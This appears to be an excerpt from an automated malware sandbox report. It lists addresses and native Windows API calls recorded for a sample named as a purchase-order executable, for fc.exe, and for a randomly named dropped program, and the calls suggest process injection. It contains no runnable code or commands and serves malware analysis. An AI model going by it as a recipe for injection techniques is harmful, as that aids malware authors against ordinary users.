              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2E80 NtReadVirtualMemory,0_2_00FD2E80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2E30 NtWriteVirtualMemory,0_2_00FD2E30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2FE0 NtCreateFile,0_2_00FD2FE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2FB0 NtResumeThread,0_2_00FD2FB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2FA0 NtQuerySection,0_2_00FD2FA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2F90 NtProtectVirtualMemory,0_2_00FD2F90
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2F60 NtCreateProcessEx,0_2_00FD2F60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2F30 NtCreateSection,0_2_00FD2F30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3090 NtSetValueKey,0_2_00FD3090
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3010 NtOpenDirectoryObject,0_2_00FD3010
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD39B0 NtGetContextThread,0_2_00FD39B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3D70 NtOpenThread,0_2_00FD3D70
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3D10 NtOpenProcessToken,0_2_00FD3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E4340 NtSetContextThread,LdrInitializeThunk,4_2_038E4340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E4650 NtSuspendThread,LdrInitializeThunk,4_2_038E4650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_038E2BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_038E2BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_038E2BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2B60 NtClose,LdrInitializeThunk,4_2_038E2B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2AD0 NtReadFile,LdrInitializeThunk,4_2_038E2AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2AF0 NtWriteFile,LdrInitializeThunk,4_2_038E2AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2FB0 NtResumeThread,LdrInitializeThunk,4_2_038E2FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2FE0 NtCreateFile,LdrInitializeThunk,4_2_038E2FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2F30 NtCreateSection,LdrInitializeThunk,4_2_038E2F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_038E2E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_038E2EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2DD0 NtDelayExecution,LdrInitializeThunk,4_2_038E2DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_038E2DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_038E2D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_038E2D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_038E2CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2C60 NtCreateKey,LdrInitializeThunk,4_2_038E2C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_038E2C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E35C0 NtCreateMutant,LdrInitializeThunk,4_2_038E35C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E39B0 NtGetContextThread,LdrInitializeThunk,4_2_038E39B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2B80 NtQueryInformationFile,4_2_038E2B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2AB0 NtWaitForSingleObject,4_2_038E2AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2F90 NtProtectVirtualMemory,4_2_038E2F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2FA0 NtQuerySection,4_2_038E2FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2F60 NtCreateProcessEx,4_2_038E2F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2EA0 NtAdjustPrivilegesToken,4_2_038E2EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2E30 NtWriteVirtualMemory,4_2_038E2E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2DB0 NtEnumerateKey,4_2_038E2DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2D00 NtSetInformationFile,4_2_038E2D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2CC0 NtQueryVirtualMemory,4_2_038E2CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2CF0 NtOpenProcess,4_2_038E2CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2C00 NtQueryInformationProcess,4_2_038E2C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3090 NtSetValueKey,4_2_038E3090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3010 NtOpenDirectoryObject,4_2_038E3010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3D10 NtOpenProcessToken,4_2_038E3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3D70 NtOpenThread,4_2_038E3D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E93B0 NtCreateFile,4_2_030E93B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E9610 NtDeleteFile,4_2_030E9610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E96B0 NtClose,4_2_030E96B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E9520 NtReadFile,4_2_030E9520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E9820 NtAllocateVirtualMemory,4_2_030E9820
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F11B910_2_00F11B91
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F28B130_2_00F28B13
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F128C00_2_00F128C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F120C90_2_00F120C9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F110000_2_00F11000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F3F1630_2_00F3F163
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F112790_2_00F11279
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F132050_2_00F13205
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F203130_2_00F20313
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F205330_2_00F20533
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F26D130_2_00F26D13
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F1E5130_2_00F1E513
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F1E5120_2_00F1E512
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F26D0E0_2_00F26D0E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F1467A0_2_00F1467A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F1E6630_2_00F1E663
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F1E6570_2_00F1E657
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103A1180_2_0103A118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010281580_2_01028158
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010601AA0_2_010601AA
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010581CC0_2_010581CC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010320000_2_01032000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F901000_2_00F90100
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105A3520_2_0105A352
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010603E60_2_010603E6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE3F00_2_00FAE3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010402740_2_01040274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010202C00_2_010202C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010605910_2_01060591
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010444200_2_01044420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010524460_2_01052446
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA05350_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104E4F60_2_0104E4F6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBC6E00_2_00FBC6E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9C7C00_2_00F9C7C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA07700_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC47500_2_00FC4750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE8F00_2_00FCE8F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F868B80_2_00F868B8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0106A9A60_2_0106A9A6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA28400_2_00FA2840
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAA8400_2_00FAA840
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A00_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB69620_2_00FB6962
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105AB400_2_0105AB40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9EA800_2_00F9EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01056BD70_2_01056BD7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90CF20_2_00F90CF2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103CD1F0_2_0103CD1F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0C000_2_00FA0C00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9ADE00_2_00F9ADE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB8DBF0_2_00FB8DBF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01040CB50_2_01040CB5
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAAD000_2_00FAAD00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01042F300_2_01042F30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01014F400_2_01014F40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2E900_2_00FB2E90
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101EFA00_2_0101EFA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0E590_2_00FA0E59
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FACFE00_2_00FACFE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105EE260_2_0105EE26
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F92FC80_2_00F92FC8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105CE930_2_0105CE93
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC0F300_2_00FC0F30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FE2F280_2_00FE2F28
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105EEDB0_2_0105EEDB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA70C00_2_00FA70C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0106B16B0_2_0106B16B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAB1B00_2_00FAB1B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8F1720_2_00F8F172
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD516C0_2_00FD516C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104F0CC0_2_0104F0CC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105F0E00_2_0105F0E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010570E90_2_010570E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105132D0_2_0105132D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBB2C00_2_00FBB2C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA52A00_2_00FA52A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FE739A0_2_00FE739A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8D34C0_2_00F8D34C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010412ED0_2_010412ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010575710_2_01057571
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F914600_2_00F91460
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103D5B00_2_0103D5B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105F43F0_2_0105F43F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105F7B00_2_0105F7B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010516CC0_2_010516CC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010359100_2_01035910
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA38E00_2_00FA38E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100D8000_2_0100D800
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA99500_2_00FA9950
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBB9500_2_00FBB950
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FE5AA00_2_00FE5AA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105FB760_2_0105FB76
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01015BF00_2_01015BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FDDBF90_2_00FDDBF9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01057A460_2_01057A46
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105FA490_2_0105FA49
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01013A6C0_2_01013A6C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBFB800_2_00FBFB80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01041AA30_2_01041AA3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103DAAC0_2_0103DAAC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104DAC60_2_0104DAC6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01051D5A0_2_01051D5A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01057D730_2_01057D73
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01019C320_2_01019C32
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBFDC00_2_00FBFDC0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA3D400_2_00FA3D40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105FCF20_2_0105FCF2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105FF090_2_0105FF09
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA9EB00_2_00FA9EB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105FFB10_2_0105FFB1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA1F920_2_00FA1F92
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0847F8903_2_0847F890
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084789403_2_08478940
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084811403_2_08481140
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0847A9603_2_0847A960
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0848113B3_2_0848113B
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0847893F3_2_0847893F
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_08478A843_2_08478A84
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_08478A903_2_08478A90
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0846EAA73_2_0846EAA7
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084995903_2_08499590
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0847A7403_2_0847A740
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_08482F403_2_08482F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039703E64_2_039703E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BE3F04_2_038BE3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396A3524_2_0396A352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039302C04_2_039302C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039502744_2_03950274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039641A24_2_039641A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039701AA4_2_039701AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039681CC4_2_039681CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A01004_2_038A0100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0394A1184_2_0394A118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039381584_2_03938158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039420004_2_03942000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038AC7C04_2_038AC7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038D47504_2_038D4750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B07704_2_038B0770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CC6E04_2_038CC6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039705914_2_03970591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B05354_2_038B0535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0395E4F64_2_0395E4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039544204_2_03954420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039624464_2_03962446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03966BD74_2_03966BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396AB404_2_0396AB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038AEA804_2_038AEA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B29A04_2_038B29A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0397A9A64_2_0397A9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038C69624_2_038C6962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038968B84_2_038968B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038DE8F04_2_038DE8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BA8404_2_038BA840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B28404_2_038B2840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0392EFA04_2_0392EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A2FC84_2_038A2FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BCFE04_2_038BCFE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03952F304_2_03952F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F2F284_2_038F2F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038D0F304_2_038D0F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03924F404_2_03924F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396CE934_2_0396CE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038C2E904_2_038C2E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396EEDB4_2_0396EEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396EE264_2_0396EE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B0E594_2_038B0E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038C8DBF4_2_038C8DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038AADE04_2_038AADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BAD004_2_038BAD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0394CD1F4_2_0394CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03950CB54_2_03950CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A0CF24_2_038A0CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B0C004_2_038B0C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F739A4_2_038F739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396132D4_2_0396132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0389D34C4_2_0389D34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B52A04_2_038B52A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CB2C04_2_038CB2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039512ED4_2_039512ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BB1B04_2_038BB1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E516C4_2_038E516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0389F1724_2_0389F172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0397B16B4_2_0397B16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B70C04_2_038B70C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0395F0CC4_2_0395F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396F0E04_2_0396F0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039670E94_2_039670E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396F7B04_2_0396F7B0
